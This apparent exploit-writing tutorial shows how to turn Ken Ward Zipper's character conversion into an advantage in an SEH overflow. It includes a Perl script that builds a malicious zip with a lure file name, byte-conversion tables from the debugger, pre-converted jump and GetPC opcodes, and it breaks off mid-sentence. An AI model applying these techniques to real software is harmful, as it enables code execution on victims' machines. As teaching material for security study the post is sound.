{"id":3530,"date":"2010-03-27T13:28:49","date_gmt":"2010-03-27T12:28:49","guid":{"rendered":"http:\/\/www.corelan.be:8800\/?p=3530"},"modified":"2010-03-27T13:28:49","modified_gmt":"2010-03-27T12:28:49","slug":"exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2010\/03\/27\/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion\/","title":{"rendered":"Exploiting Ken Ward Zipper : Taking advantage of payload conversion"},"content":{"rendered":"<p>In the <a href=\"https:\/\/web.archive.org\/web\/20201021123500\/https:\/\/abysssec.com\/blog\/2010\/03\/ken-ward-zipper-stack-bof-0day-a-not-so-typical-seh-exploit\/\">article I wrote on the abysssec.com<\/a> website, I explained the steps and techniques needed to build a working exploit for Ken Ward's zipper.<\/p>\n<p>One of the main difficulties I had to overcome when building the exploit, was the character set limitation.&#160; I basically could only use a subset of the ascii characters (only the characters that are allowed in a filename) in my payload, because the other characters got converted to something else. And that may either break the exploit structure or change the behaviour of the payload inside the application.<\/p>\n<p>As a result of that, I simply tried to avoid using those &quot;bad chars&quot; altogether and found some ways to make it work, using chained jumps, custom ascii decoders and alpha2-encoded code. 
Lots of complexity, but nevertheless it works fine.<\/p>\n<p>Today, I will explain an alternative way to approach character set limitations, and perhaps take advantage of the behaviour of the character set conversion process to make the exploit less complex.&#160; Basically, I'll try to use the conversion as a benefit instead of a problem.<\/p>\n<p>2 of my friends from Corelan Team (TecR0c and mr_me) pointed out that we can take advantage of this, and TecR0c documented the result of the conversion process.&#160; You can find his table here.&#160; Shortly after, my friend _sinn3r (also from Corelan Team) applied this technique to write <a href=\"http:\/\/www.exploit-db.com\/exploits\/11872\">an exploit<\/a> for the Ken Ward vulnerability.<\/p>\n<p>So I guess this is a good time to throw my 2 cents in as well, and look at how we can document the conversion process and what we can do with this.<\/p>\n<blockquote>\n<p>Important : Before reading this post, I strongly suggest you read the article on the abysssec.com blog.&#160; If you don't read that article, it will be impossible for you to understand certain concepts, assumptions and decisions in this post.<\/p>\n<\/blockquote>\n<p>Summarizing the abysssec.com article, we know that<\/p>\n<ul>\n<li>the offset to nseh is 1022 bytes <\/li>\n<li>we can use a pointer to ppr from the executable itself <\/li>\n<li>the shellcode can be found, unmodified, in memory <\/li>\n<li>we have to deploy an egg hunter to locate and execute the shellcode <\/li>\n<\/ul>\n<p>Because of the character set limitation, I had to use multiple jumps back and forward, I had to write code to align esp, build and run custom decoders to make a register point to the beginning of the egg hunter, and run the egg hunter.<\/p>\n<p>Works fine, but the process of doing that was rather complex and time consuming.<\/p>\n<h3>Impact of character set conversion<\/h3>\n<p>2 things can happen when a payload is subject to conversion : it can get 
truncated: the payload gets cut off and parts of it are lost, which will most likely hurt your chances of building a working exploit.<\/p>\n<p>Alternatively, bytes can get mangled\/replaced\/expanded.&#160; When that happens, the payload can still be cut off, because certain characters either have that effect on the payload string, or will give a specific meaning to the exploit buffer. If for example a byte gets converted to 0x5c, and you are dealing with filenames, then 5c (backslash) may change the way the string gets processed by the application.&#160; This does not have to be a problem, but it will most likely change offsets or the location where shellcode can be found.<\/p>\n<p>If you are careful, you may be able to survive the conversion and perhaps you can use the conversion process itself to build an exploit.<\/p>\n<p>So, after you have figured out that your payload is indeed subject to conversion, it will be important to find out what the impact of the conversion will be on the payload.<\/p>\n<p>In order to find that out, all we need to do is create a string that contains all (or most) bytes, and feed those to the application.<\/p>\n<p>Take a look at this script :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\"># Exploit script for Ken Ward's zipper\n# Taking advantage of payload conversion\n# Written by Peter Van Eeckhoutte\n# http:\/\/www.corelan.be:8800\n#---------------------------------------------------\nmy $sploitfile=&quot;corelan_kenward.zip&quot;;\n\n# local file header (30 bytes)\nmy $ldf_header = &quot;\\x50\\x4B\\x03\\x04\\x14\\x00\\x00&quot;.\n&quot;\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00&quot; .\n&quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot; .\n&quot;\\xe4\\x0f&quot; .\n&quot;\\x00\\x00\\x00&quot;;\n\n# central directory file header (46 bytes)\nmy $cdf_header = &quot;\\x50\\x4B\\x01\\x02\\x14\\x00\\x14&quot;.\n&quot;\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00&quot; .\n&quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;.\n&quot;\\xe4\\x0f&quot;.\n&quot;\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00&quot;.\n&quot;\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;;\n\n# end of central directory record (22 bytes)\nmy $eofcdf_header = &quot;\\x50\\x4B\\x05\\x06\\x00\\x00\\x00&quot;.\n&quot;\\x00\\x01\\x00\\x01\\x00&quot;.\n&quot;\\x12\\x10\\x00\\x00&quot;.\n&quot;\\x02\\x10\\x00\\x00&quot;.\n&quot;\\x00\\x00&quot;;\n\nprint &quot;[+] Preparing payload\\n&quot;;\n\nmy $size=4064;\nmy $offset=1022;\nmy $filename=  &quot;Admin accounts and passwords.txt&quot;.(&quot; &quot; x 100);\nmy $junk = &quot;A&quot; x ($offset - length($filename));\nmy $nseh=&quot;BBBB&quot;;\nmy $seh=&quot;CCCC&quot;;\nmy $payload = $filename.$junk.$nseh.$seh;\n# test pattern : every byte from 0x01 to 0xff, minus the 5 excluded below\nmy $testpattern=&quot;&quot;;\nmy $cnt=1;\nwhile ($cnt &lt; 256)\n{\n  #new line, carriage return\n  if ( ($cnt ne 10) &amp;&amp;  ($cnt ne 13))\n  {\n    #forward slash, colon, backslash\n    if ( ($cnt ne 47) &amp;&amp; ($cnt ne 58) &amp;&amp; ($cnt ne 92))\n    {\n      $testpattern=$testpattern.chr($cnt);\n    }\n  }\n  $cnt=$cnt+1;\n}\n\nmy $rest = &quot;D&quot; x ($size-length($payload.$testpattern));\n\n$payload=$payload.$testpattern.$rest.&quot;.txt&quot;;\n\nmy $evilzip = $ldf_header.$payload.\n              $cdf_header.$payload.\n              $eofcdf_header;\n\nprint &quot;[+] Removing old zip file\\n&quot;;\nsystem(&quot;del $sploitfile&quot;);\nprint &quot;[+] Writing payload to file\\n&quot;;\nopen(FILE,&quot;&gt;$sploitfile&quot;);\nbinmode(FILE);   # raw bytes, no newline translation on Windows\nprint FILE $evilzip;\nclose(FILE);\nprint &quot;[+] Wrote &quot;.length($evilzip).&quot; bytes to file $sploitfile\\n&quot;;\nprint &quot;[+] Payload length : &quot; . length($payload).&quot;\\n&quot;;<\/pre>\n<p>After overwriting nseh (with &quot;BBBB&quot;) and seh (with &quot;CCCC&quot;), I put the testpattern. This testpattern consists of most bytes between 0x01 and 0xFF. I only excluded a bunch of bytes because I figured out (trial &amp; error) that they have an impact on the behaviour of the application when processing the payload :<\/p>\n<ul>\n<li>new line and carriage return <\/li>\n<li>forward slash, backslash and colon <\/li>\n<\/ul>\n<p>These 5 bytes can be considered &quot;bad chars&quot; right away.&#160; That does not mean that we cannot use them at all, we'll just have to take into account that they will dramatically change the behaviour, so we would need to change the entire exploit script.<\/p>\n<p>Anyway, create a zip file with the script above.&#160; Open Ken Ward zipper, attach Immunity to it, open the zip file.<\/p>\n<p>Then, double click on the filename &quot;Admin accounts and passwords.txt&quot; inside the zip.&#160; This will trigger an access violation and Immunity Debugger will take control.<\/p>\n<p>Verify that the SEH record is still overwritten (&quot;BBBB&quot; and &quot;CCCC&quot;) :<\/p>\n<p><a href=\"\/wp-content\/uploads\/2010\/03\/image30.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px\" title=\"image\" border=\"0\" alt=\"image\" src=\"\/wp-content\/uploads\/2010\/03\/image_thumb60.png\" width=\"493\" height=\"203\" \/><\/a><\/p>\n<p>Locate your payload on the stack, and look at 
the payload right after where the SE record got overwritten :<\/p>\n<p><a href=\"\/wp-content\/uploads\/2010\/03\/image31.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px\" title=\"image\" border=\"0\" alt=\"image\" src=\"\/wp-content\/uploads\/2010\/03\/image_thumb61.png\" width=\"301\" height=\"309\" \/><\/a><\/p>\n<p>We can see the $testpattern that was positioned in the payload after overwriting the SE record.<\/p>\n<p>So far so good.<\/p>\n<h3>Determine &amp; document impact of the conversion<\/h3>\n<p>Now that we have found our test pattern, we need to locate and document the bytes that were changed to something else.&#160; We need the documentation to determine if we can take advantage of certain conversions in order to make our exploit less complex.<\/p>\n<p>There are 2 ways to determine and document the conversion.<\/p>\n<p>You can do this by hand. Basically just write down the original bytes and locate the converted byte in the payload, and write them next to each other.&#160; (Don't forget that we have excluded certain bytes from the payload !)&#160; It will take a little while, but it should work fine.<\/p>\n<p>Alternatively, we can let pvefindaddr do this nasty work for us.<\/p>\n<p>Grab yourself a copy of pvefindaddr (version &gt;= 1.27 ! 
- the older versions have a small bug that would produce inaccurate results).<\/p>\n<p>Next, add the following lines of code to the bottom of the perl script and run the script again :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\"># single quotes : in a double-quoted Perl string \\t would become a tab\nopen(FILE,'&gt;c:\\tmp\\pattern.bin');\nbinmode(FILE);\nprint FILE $testpattern;\nclose(FILE);<\/pre>\n<p>At this point, we have the test pattern written to the stack, and written to a file. This means that we can use pvefindaddr to compare those 2 and indicate the changes : <\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">!pvefindaddr compare c:\\tmp\\pattern.bin<\/pre>\n<p>Wait until the compare action has completed, and then open the file compare.txt (in the Immunity Debugger program folder).<\/p>\n<p>Locate the section in the file, pointing to the address on the stack where we have found our payload (0x0012F910 in our example).<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">* Reading memory at location 0x0012F910\n   Corruption at position 12 : Original byte : 0f - Byte in memory : a4\n   Corruption at position 17 : 
Original byte : 14 - Byte in memory : b6\n   Corruption at position 18 : Original byte : 15 - Byte in memory : a7\n   Corruption at position 122 : Original byte : 80 - Byte in memory : c7\n   Corruption at position 123 : Original byte : 81 - Byte in memory : fc\n   Corruption at position 124 : Original byte : 82 - Byte in memory : e9\n   Corruption at position 125 : Original byte : 83 - Byte in memory : e2\n   Corruption at position 126 : Original byte : 84 - Byte in memory : e4\n   Corruption at position 127 : Original byte : 85 - Byte in memory : e0\n   Corruption at position 128 : Original byte : 86 - Byte in memory : e5\n   Corruption at position 129 : Original byte : 87 - Byte in memory : e7\n   Corruption at position 130 : Original byte : 88 - Byte in memory : ea\n   Corruption at position 131 : Original byte : 89 - Byte in memory : eb\n   Corruption at position 132 : Original byte : 8a - Byte in memory : e8\n   Corruption at position 133 : Original byte : 8b - Byte in memory : ef\n   Corruption at position 134 : Original byte : 8c - Byte in memory : ee\n   Corruption at position 135 : Original byte : 8d - Byte in memory : ec\n   Corruption at position 136 : Original byte : 8e - Byte in memory : c4\n   Corruption at position 137 : Original byte : 8f - Byte in memory : c5\n   Corruption at position 138 : Original byte : 90 - Byte in memory : c9\n   Corruption at position 139 : Original byte : 91 - Byte in memory : e6\n   Corruption at position 140 : Original byte : 92 - Byte in memory : c6\n   Corruption at position 141 : Original byte : 93 - Byte in memory : f4\n   Corruption at position 142 : Original byte : 94 - Byte in memory : f6\n   Corruption at position 143 : Original byte : 95 - Byte in memory : f2\n   Corruption at position 144 : Original byte : 96 - Byte in memory : fb\n   Corruption at position 145 : Original byte : 97 - Byte in memory : f9\n   Corruption at position 146 : Original byte : 98 - Byte in memory : ff\n   Corruption at position 147 : 
Original byte : 99 - Byte in memory : d6\n   Corruption at position 148 : Original byte : 9a - Byte in memory : dc\n   Corruption at position 149 : Original byte : 9b - Byte in memory : a2\n   Corruption at position 150 : Original byte : 9c - Byte in memory : a3\n   Corruption at position 151 : Original byte : 9d - Byte in memory : a5\n   Corruption at position 152 : Original byte : 9e - Byte in memory : 50\n   Corruption at position 153 : Original byte : 9f - Byte in memory : 83\n   Corruption at position 154 : Original byte : a0 - Byte in memory : e1\n   Corruption at position 155 : Original byte : a1 - Byte in memory : ed\n   Corruption at position 156 : Original byte : a2 - Byte in memory : f3\n   Corruption at position 157 : Original byte : a3 - Byte in memory : fa\n   Corruption at position 158 : Original byte : a4 - Byte in memory : f1\n   Corruption at position 159 : Original byte : a5 - Byte in memory : d1\n   Corruption at position 160 : Original byte : a6 - Byte in memory : aa\n   Corruption at position 161 : Original byte : a7 - Byte in memory : ba\n   Corruption at position 162 : Original byte : a8 - Byte in memory : bf\n   Corruption at position 163 : Original byte : a9 - Byte in memory : ac\n   Corruption at position 164 : Original byte : aa - Byte in memory : ac\n   Corruption at position 165 : Original byte : ab - Byte in memory : bd\n   Corruption at position 166 : Original byte : ac - Byte in memory : bc\n   Corruption at position 167 : Original byte : ad - Byte in memory : a1\n   Corruption at position 168 : Original byte : ae - Byte in memory : ab\n   Corruption at position 169 : Original byte : af - Byte in memory : bb\n   Corruption at position 170 : Original byte : b0 - Byte in memory : a6\n   Corruption at position 171 : Original byte : b1 - Byte in memory : a6\n   Corruption at position 172 : Original byte : b2 - Byte in memory : a6\n   Corruption at position 173 : Original byte : b3 - Byte in memory : a6\n   Corruption at position 174 : 
Original byte : b4 - Byte in memory : a6\n   Corruption at position 175 : Original byte : b5 - Byte in memory : a6\n   Corruption at position 176 : Original byte : b6 - Byte in memory : a6\n   Corruption at position 177 : Original byte : b7 - Byte in memory : 2b\n   Corruption at position 178 : Original byte : b8 - Byte in memory : 2b\n   Corruption at position 179 : Original byte : b9 - Byte in memory : a6\n   Corruption at position 180 : Original byte : ba - Byte in memory : a6\n   Corruption at position 181 : Original byte : bb - Byte in memory : 2b\n   Corruption at position 182 : Original byte : bc - Byte in memory : 2b\n   Corruption at position 183 : Original byte : bd - Byte in memory : 2b\n   Corruption at position 184 : Original byte : be - Byte in memory : 2b\n   Corruption at position 185 : Original byte : bf - Byte in memory : 2b\n   Corruption at position 186 : Original byte : c0 - Byte in memory : 2b\n   Corruption at position 187 : Original byte : c1 - Byte in memory : 2d\n   Corruption at position 188 : Original byte : c2 - Byte in memory : 2d\n   Corruption at position 189 : Original byte : c3 - Byte in memory : 2b\n   Corruption at position 190 : Original byte : c4 - Byte in memory : 2d\n   Corruption at position 191 : Original byte : c5 - Byte in memory : 2b\n   Corruption at position 192 : Original byte : c6 - Byte in memory : a6\n   Corruption at position 193 : Original byte : c7 - Byte in memory : a6\n   Corruption at position 194 : Original byte : c8 - Byte in memory : 2b\n   Corruption at position 195 : Original byte : c9 - Byte in memory : 2b\n   Corruption at position 196 : Original byte : ca - Byte in memory : 2d\n   Corruption at position 197 : Original byte : cb - Byte in memory : 2d\n   Corruption at position 198 : Original byte : cc - Byte in memory : a6\n   Corruption at position 199 : Original byte : cd - Byte in memory : 2d\n   Corruption at position 200 : Original byte : ce - Byte in memory : 2b\n   Corruption at position 201 : 
Original byte : cf - Byte in memory : 2d\n   Corruption at position 202 : Original byte : d0 - Byte in memory : 2d\n   Corruption at position 203 : Original byte : d1 - Byte in memory : 2d\n   Corruption at position 204 : Original byte : d2 - Byte in memory : 2d\n   Corruption at position 205 : Original byte : d3 - Byte in memory : 2b\n   Corruption at position 206 : Original byte : d4 - Byte in memory : 2b\n   Corruption at position 207 : Original byte : d5 - Byte in memory : 2b\n   Corruption at position 208 : Original byte : d6 - Byte in memory : 2b\n   Corruption at position 209 : Original byte : d7 - Byte in memory : 2b\n   Corruption at position 210 : Original byte : d8 - Byte in memory : 2b\n   Corruption at position 211 : Original byte : d9 - Byte in memory : 2b\n   Corruption at position 212 : Original byte : da - Byte in memory : 2b\n   Corruption at position 213 : Original byte : db - Byte in memory : a6\n   Corruption at position 214 : Original byte : dc - Byte in memory : 5f\n   Corruption at position 215 : Original byte : dd - Byte in memory : a6\n   Corruption at position 216 : Original byte : de - Byte in memory : a6\n   Corruption at position 217 : Original byte : df - Byte in memory : af\n   Corruption at position 218 : Original byte : e0 - Byte in memory : 61\n   Corruption at position 219 : Original byte : e1 - Byte in memory : df\n   Corruption at position 220 : Original byte : e2 - Byte in memory : 47\n   Corruption at position 221 : Original byte : e3 - Byte in memory : 70\n   Corruption at position 222 : Original byte : e4 - Byte in memory : 53\n   Corruption at position 223 : Original byte : e5 - Byte in memory : 73\n   Corruption at position 224 : Original byte : e6 - Byte in memory : b5\n   Corruption at position 225 : Original byte : e7 - Byte in memory : 74\n   Corruption at position 226 : Original byte : e8 - Byte in memory : 46\n   Corruption at position 227 : Original byte : e9 - Byte in memory : 54\n   Corruption at position 228 : 
Original byte : ea - Byte in memory : 4f\n   Corruption at position 229 : Original byte : eb - Byte in memory : 64\n   Corruption at position 230 : Original byte : ec - Byte in memory : 38\n   Corruption at position 231 : Original byte : ed - Byte in memory : 66\n   Corruption at position 232 : Original byte : ee - Byte in memory : 65\n   Corruption at position 233 : Original byte : ef - Byte in memory : 6e\n   Corruption at position 234 : Original byte : f0 - Byte in memory : 3d\n   Corruption at position 235 : Original byte : f1 - Byte in memory : b1\n   Corruption at position 236 : Original byte : f2 - Byte in memory : 3d\n   Corruption at position 237 : Original byte : f3 - Byte in memory : 3d\n   Corruption at position 238 : Original byte : f4 - Byte in memory : 28\n   Corruption at position 239 : Original byte : f5 - Byte in memory : 29\n   Corruption at position 240 : Original byte : f6 - Byte in memory : f7\n   Corruption at position 241 : Original byte : f7 - Byte in memory : 98\n   Corruption at position 242 : Original byte : f8 - Byte in memory : b0\n   Corruption at position 243 : Original byte : f9 - Byte in memory : b7\n   Corruption at position 244 : Original byte : fa - Byte in memory : b7\n   Corruption at position 245 : Original byte : fb - Byte in memory : 76\n   Corruption at position 246 : Original byte : fc - Byte in memory : 6e\n   Corruption at position 247 : Original byte : fd - Byte in memory : b2\n   Corruption at position 248 : Original byte : fe - Byte in memory : a6\n   Corruption at position 249 : Original byte : ff - Byte in memory : a0\n     -&gt; Only 119 original bytes found\n      +-----------------------+-----------------------+\n      | FILE                  | MEMORY                |\n      +-----------------------+-----------------------+\n      |01|02|03|04|05|06|07|08|01|02|03|04|05|06|07|08|\n      |09|0b|0c|0e|0f|10|11|12|09|0b|0c|0e|--|10|11|12|\n      |13|14|15|16|17|18|19|1a|13|--|--|16|17|18|19|1a|\n      
|1b|1c|1d|1e|1f|20|21|22|1b|1c|1d|1e|1f|20|21|22|\n      |23|24|25|26|27|28|29|2a|23|24|25|26|27|28|29|2a|\n      |2b|2c|2d|2e|30|31|32|33|2b|2c|2d|2e|30|31|32|33|\n      |34|35|36|37|38|39|3b|3c|34|35|36|37|38|39|3b|3c|\n      |3d|3e|3f|40|41|42|43|44|3d|3e|3f|40|41|42|43|44|\n      |45|46|47|48|49|4a|4b|4c|45|46|47|48|49|4a|4b|4c|\n      |4d|4e|4f|50|51|52|53|54|4d|4e|4f|50|51|52|53|54|\n      |55|56|57|58|59|5a|5b|5d|55|56|57|58|59|5a|5b|5d|\n      |5e|5f|60|61|62|63|64|65|5e|5f|60|61|62|63|64|65|\n      |66|67|68|69|6a|6b|6c|6d|66|67|68|69|6a|6b|6c|6d|\n      |6e|6f|70|71|72|73|74|75|6e|6f|70|71|72|73|74|75|\n      |76|77|78|79|7a|7b|7c|7d|76|77|78|79|7a|7b|7c|7d|\n      |7e|7f|80|81|82|83|84|85|7e|7f|--|--|--|--|--|--|\n      |86|87|88|89|8a|8b|8c|8d|--|--|--|--|--|--|--|--|\n      |8e|8f|90|91|92|93|94|95|--|--|--|--|--|--|--|--|\n      |96|97|98|99|9a|9b|9c|9d|--|--|--|--|--|--|--|--|\n      |9e|9f|a0|a1|a2|a3|a4|a5|--|--|--|--|--|--|--|--|\n      |a6|a7|a8|a9|aa|ab|ac|ad|--|--|--|--|--|--|--|--|\n      |ae|af|b0|b1|b2|b3|b4|b5|--|--|--|--|--|--|--|--|\n      |b6|b7|b8|b9|ba|bb|bc|bd|--|--|--|--|--|--|--|--|\n      |be|bf|c0|c1|c2|c3|c4|c5|--|--|--|--|--|--|--|--|\n      |c6|c7|c8|c9|ca|cb|cc|cd|--|--|--|--|--|--|--|--|\n      |ce|cf|d0|d1|d2|d3|d4|d5|--|--|--|--|--|--|--|--|\n      |d6|d7|d8|d9|da|db|dc|dd|--|--|--|--|--|--|--|--|\n      |de|df|e0|e1|e2|e3|e4|e5|--|--|--|--|--|--|--|--|\n      |e6|e7|e8|e9|ea|eb|ec|ed|--|--|--|--|--|--|--|--|\n      |ee|ef|f0|f1|f2|f3|f4|f5|--|--|--|--|--|--|--|--|\n      |f6|f7|f8|f9|fa|fb|fc|fd|--|--|--|--|--|--|--|--|\n      |fe|ff|            |--|--|            |\n      +-----------------------+-----------------------+<\/pre>\n<p>Ah that's nice. We can see that most of the characters in the regular range of ascii characters are identical. 
All of the ones above 0x7f have been changed, and we now have a complete list of the conversion that took place on these bytes.<\/p>\n<h3>What can we do with this ?<\/h3>\n<p>Good question... well, we can do a lot with this.<\/p>\n<p>This means that we can use all of the resulting bytes (bytes that are the result of the conversion of another byte) in opcodes, in instructions that would make our life easier when writing exploits. Of course, you need to use the original bytes in the payload (and count on the conversion to turn them into useful bytes at runtime).<\/p>\n<p>Some examples :<\/p>\n<h4>Forward and backward jumps<\/h4>\n<p>In the QuickZip articles as well as in the Ken Ward article on abysssec.com, we had to deal with a situation where we had to jump forward or backwards, and we had to use a conditional jump to do so.&#160; These jumps were short jumps, so we were limited in the number of bytes we could jump back or forward.<\/p>\n<p>When you look at the conversion table, you find out that we can use 0xeb to make a jump !&#160; In fact, 0x89 will get converted to 0xeb.<\/p>\n<p>So that means that, if you want to jump forward for example 12 (0x0c) bytes, then you can use 0x89 0x0c to do so.&#160; At runtime, these 2 bytes will get converted to 0xeb 0x0c, and that's a jump forward.<\/p>\n<p>In case of backward jumps, we can do exactly the same.&#160; At nseh, for example, we can make a jump back.&#160; Locate all bytes in the compare.txt file that would - after conversion - result in a byte that starts with an &quot;f&quot;.<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">   Corruption at position 123 : Original byte : 81 - Byte in memory : fc\n   Corruption at position 141 : Original byte : 93 - 
Byte in memory : f4\n   Corruption at position 142 : Original byte : 94 - Byte in memory : f6\n   Corruption at position 143 : Original byte : 95 - Byte in memory : f2\n   Corruption at position 144 : Original byte : 96 - Byte in memory : fb\n   Corruption at position 145 : Original byte : 97 - Byte in memory : f9\n   Corruption at position 146 : Original byte : 98 - Byte in memory : ff\n   Corruption at position 156 : Original byte : a2 - Byte in memory : f3\n   Corruption at position 157 : Original byte : a3 - Byte in memory : fa\n   Corruption at position 158 : Original byte : a4 - Byte in memory : f1\n   Corruption at position 240 : Original byte : f6 - Byte in memory : f7<\/pre>\n<p>(you can even expand the list and include bytes that start with &quot;e&quot; as well - those would result in a jump back as well)<\/p>\n<p>So if you want to jump back 12 bytes, you want to get 0xeb 0xf4.&#160; So by using 0x89 0x93, you will get a jump back of 12 bytes at runtime.<\/p>\n<p>If you want to make a far jump back, you need to use a 4 byte offset (instead of a single byte offset).<\/p>\n<p>Let's say you want to jump back 800 bytes. The opcode to do this is 0xe9 0xe0 0xfc 0xff 0xff<\/p>\n<p>In order to get this opcode, you will need to write this in the payload : 0x82 0x85 0x81 0x98 0x98<\/p>\n<p>That's not too bad, is it ? \ud83d\ude42<\/p>\n<h4>Pointers<\/h4>\n<p>We are not limited to reproducing instructions... 
we can also take advantage of the conversion when writing pointers to the stack.&#160; What if the only working pointer to pop pop ret contains an invalid byte or a byte that will get converted to something else ?&#160; Well, you can try to use the conversion in a positive way there too.<\/p>\n<p>Let's say the pointer to pop pop ret you want to use is 0x0046BBFA.&#160; The null byte is not a problem, and 46 is not a problem either.&#160; But both BB and FA get converted to something else.&#160; So if we want to get 0x0046BBFA after conversion, we need to write 0x0046AFA3.&#160; AF will get converted to BB and A3 will get converted to FA.<\/p>\n<h4>Jump to registers<\/h4>\n<p>Jumpcode can be reproduced too :<\/p>\n<ul>\n<li>jmp eax : 0xff 0xe0 -&gt; 0x98 0x85 <\/li>\n<li>jmp ecx : 0xff 0xe1 -&gt; 0x98 0xa0 <\/li>\n<li>jmp edx : 0xff 0xe2 -&gt; 0x98 0x83 <\/li>\n<li>jmp ebx : 0xff 0xe3 -&gt; not possible <\/li>\n<li>jmp esp : 0xff 0xe4 -&gt; 0x98 0x84 <\/li>\n<li>jmp ebp : 0xff 0xe5 -&gt; 0x98 0x86 <\/li>\n<li>jmp esi : 0xff 0xe6 -&gt; 0x98 0x91 <\/li>\n<li>jmp edi : 0xff 0xe7 -&gt; 0x98 0x87 <\/li>\n<\/ul>\n<h4>Alphanum GetPC code ?<\/h4>\n<p>You can even take things one step further.&#160; Perhaps we can produce GetPC code.<\/p>\n<p>If we can do that, we don't need custom (complex) decoders anymore.<\/p>\n<p>If we can use GetPC code, then we can prepend any alpha2 generated shellcode with the GetPC code, and make the encoded egg hunter (or shellcode) work without having to align a register first.<\/p>\n<p>If that works, this would be a huge time saver !<\/p>\n<p>Take a look at the backward call getPC code (as illustrated in <a href=\"\/index.php\/2010\/02\/25\/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding\/\">my shellcoding tutorial<\/a>) :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: 
#808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">[BITS 32]\njmp short corelan\ngeteip:\n  pop esi       ;esi = return address pushed by call geteip\n  call esi      ;this will jump to decoder\ncorelan:\n  call geteip\n  decoder:\n    ; decoder goes here\n\n  shellcode:\n    ; encoded shellcode goes here<\/pre>\n<p>If we look at the opcodes for this GetPC routine, we get this :<\/p>\n<ul>\n<li>jmp short corelan :&#160; 0xeb 0x03 (skips the 3 bytes of pop esi and call esi) <\/li>\n<li>geteip : pop esi : 0x5e <\/li>\n<li>call esi : 0xff 0xd6 <\/li>\n<li>corelan : call geteip : 0xe8 0xf8 0xff 0xff 0xff (displacement -8, back to pop esi) <\/li>\n<\/ul>\n<p>When this GetPC code runs, the call pushes the address of the byte directly after the call geteip instruction.&#160; pop esi loads that address into esi, and call esi transfers execution there.<\/p>\n<p>Let's apply the conversion again :<\/p>\n<ul>\n<li>0xeb 0x03 : 0x89 0x03&#160; (as we can see in the compare.txt file, 03 was not changed by the conversion) <\/li>\n<li>0x5e : no conversion <\/li>\n<li>0xff 0xd6 : 0x98 0x99 <\/li>\n<li>0xe8 0xf8 0xff 0xff 0xff&#160; : 0x8a 0x?? 0x98 0x98 0x98 <\/li>\n<\/ul>\n<p>We have a little issue here : none of the conversions will produce 0xf8, so a displacement of -8 cannot be written.&#160; We need to change the code just a little (change the offsets and insert &quot;nop&quot; alike instructions) so that the displacement becomes one we can produce.&#160; 0x94 gets converted to 0xf6, which is -10, so the call has to sit 10 bytes after pop esi instead of 8.&#160; Two inc ecx instructions (0x41, which survives the conversion) make up the difference.<\/p>\n<p>Take a look at this code :<\/p>\n<pre style=\"border-bottom: #808080 1px solid; border-left: #808080 1px solid; padding-bottom: 5px; background-color: #e2e2e2; min-height: 40px; padding-left: 5px; width: 600px; padding-right: 5px; overflow: auto; border-top: #808080 1px solid; border-right: #808080 1px solid; padding-top: 5px\">#alphanum GetPC code\n#written by Peter Van Eeckhoutte\nmy $getpc =\n&quot;\\x89\\x05&quot;.   #becomes eb 05 : jmp short (5 bytes) to the call at the end\n&quot;\\x5e&quot;.       #pop esi\n&quot;\\x41&quot;.       #nop (inc ecx)\n&quot;\\x98\\x99&quot;.   #becomes ff d6 : call esi\n&quot;\\x41&quot;.       #nop (inc ecx)\n&quot;\\x8a\\x94\\x98\\x98\\x98&quot;;  #becomes e8 f6 ff ff ff : call back (-10) to pop esi<\/pre>\n<p>After this code got converted, the end result (at run time) is :<\/p>\n<p><a href=\"\/wp-content\/uploads\/2010\/03\/image32.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px\" title=\"image\" border=\"0\" alt=\"image\" src=\"\/wp-content\/uploads\/2010\/03\/image_thumb63.png\" width=\"482\" height=\"100\" \/><\/a><\/p>\n<p>Ah - that's exactly what we wanted to achieve.&#160; The routine is 12 bytes long and the call at the end pushes the address of the byte right after it, so right after this code has run, ESI will point to the 